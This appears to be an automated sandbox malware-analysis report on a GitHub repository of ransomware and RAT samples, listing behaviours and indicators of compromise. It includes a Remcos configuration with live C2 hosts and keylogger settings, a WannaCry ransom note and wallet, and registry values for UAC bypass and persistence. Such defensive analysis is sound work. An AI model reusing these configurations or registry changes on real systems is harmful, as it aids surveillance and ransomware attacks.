badrabbit | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Resubmissions

05-08-2024 10:09

240805-l7ag4atakn 10

05-08-2024 10:08

240805-l6ck3atajl 10

Analysis

max time kernel
447s
max time network
448s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-08-2024 10:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

badrabbit mimikatz remcos wannacry host defense_evasion discovery evasion execution impact persistence ransomware rat spyware stealer trojan worm

Malware Config

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Host

nickman12-46565.portmap.io:46565

nickman12-46565.portmap.io:1735

Attributes

audio_folder
audio
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
5
copy_file
Userdata.exe
copy_folder
Userdata
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%WinDir%\System32
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%WinDir%\System32
mouse_option
false
mutex
remcos_vcexssuhap
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screens
screenshot_path
%AppData%
screenshot_time
1
startup_value
remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
ransomware badrabbit
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Modifies visibility of file extensions in Explorer 2 TTPs 43 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

UAC bypass 3 TTPs 47 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/files/0x000c000000023558-507.dat	mimikatz

Blocklisted process makes network request 2 IoCs

flow	pid	Process
494	3432	rundll32.exe
628	3432	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	Remcos.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	liAkMUUQ.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5304.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD531B.tmp	WannaCry.exe

Executes dropped EXE 64 IoCs

pid	Process
1612	Remcos.exe
3876	Userdata.exe
772	Remcos.exe
3204	Remcos.exe
3020	Remcos.exe
4808	Remcos.exe
1636	Remcos.exe
4276	BadRabbit.exe
2352	4973.tmp
1908	BadRabbit.exe
4836	BadRabbit.exe
2312	BadRabbit.exe
2236	BadRabbit.exe
2384	BadRabbit.exe
2792	BadRabbit.exe
2168	BadRabbit.exe
3436	BadRabbit.exe
4060	BadRabbit.exe
64	BadRabbit.exe
3684	BadRabbit.exe
1424	BadRabbit.exe
4428	BadRabbit.exe
3856	BadRabbit.exe
4632	BadRabbit.exe
4112	Remcos.exe
2864	BadRabbit.exe
1908	Satana.exe
4812	Satana.exe
224	Satana.exe
3156	Satana.exe
2784	Satana.exe
1788	Satana.exe
4256	Satana.exe
8	Satana.exe
3700	Satana.exe
4076	Satana.exe
3856	Satana.exe
4012	Satana.exe
2860	Satana.exe
4000	Satana.exe
4568	Satana.exe
3420	Satana.exe
3904	WannaCry.exe
3304	WannaCry.exe
4900	!WannaDecryptor!.exe
60	WannaCry.exe
3856	WannaCry.exe
3852	!WannaDecryptor!.exe
1532	!WannaDecryptor!.exe
2852	!WannaDecryptor!.exe
1144	ViraLock.exe
1568	QeIwwoYc.exe
1576	liAkMUUQ.exe
1132	ViraLock.exe
692	ViraLock.exe
3940	ViraLock.exe
4640	ViraLock.exe
3612	ViraLock.exe
3640	ViraLock.exe
1012	ViraLock.exe
5088	ViraLock.exe
3640	ViraLock.exe
3044	ViraLock.exe
716	ViraLock.exe

Loads dropped DLL 17 IoCs

pid	Process
3432	rundll32.exe
1648	rundll32.exe
4824	rundll32.exe
4392	rundll32.exe
1948	rundll32.exe
4284	rundll32.exe
376	rundll32.exe
4332	rundll32.exe
4756	rundll32.exe
4764	rundll32.exe
1948	rundll32.exe
4812	rundll32.exe
4568	rundll32.exe
1288	rundll32.exe
3260	rundll32.exe
3876	rundll32.exe
4568	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\liAkMUUQ.exe = "C:\\ProgramData\\PmsAEgIc\\liAkMUUQ.exe"	liAkMUUQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QeIwwoYc.exe = "C:\\Users\\Admin\\gIUsIoUY\\QeIwwoYc.exe"	QeIwwoYc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Userdata.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QeIwwoYc.exe = "C:\\Users\\Admin\\gIUsIoUY\\QeIwwoYc.exe"	ViraLock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\liAkMUUQ.exe = "C:\\ProgramData\\PmsAEgIc\\liAkMUUQ.exe"	ViraLock.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
45	raw.githubusercontent.com
46	raw.githubusercontent.com

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\remcos\logs.dat	iexplore.exe
File created	C:\Windows\SysWOW64\remcos\logs.dat	iexplore.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata	Remcos.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 3876 set thread context of 4168	3876	Userdata.exe	118
PID 772 set thread context of 4296	772	Remcos.exe	128
PID 1908 set thread context of 224	1908	Satana.exe	217
PID 4812 set thread context of 3156	4812	Satana.exe	221
PID 2784 set thread context of 4256	2784	Satana.exe	226
PID 1788 set thread context of 8	1788	Satana.exe	229
PID 3700 set thread context of 4012	3700	Satana.exe	236
PID 4076 set thread context of 2860	4076	Satana.exe	237
PID 3856 set thread context of 4000	3856	Satana.exe	242
PID 4568 set thread context of 3420	4568	Satana.exe	246

Drops file in Windows directory 37 IoCs

description	ioc	Process
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\dispci.exe	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\cscc.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\4973.tmp	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
376	224	WerFault.exe	217
4504	3156	WerFault.exe	221
4572	4256	WerFault.exe	226
2892	8	WerFault.exe	229
2384	4012	WerFault.exe	236
1464	2860	WerFault.exe	237
3164	4000	WerFault.exe	242
1240	3420	WerFault.exe	246

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
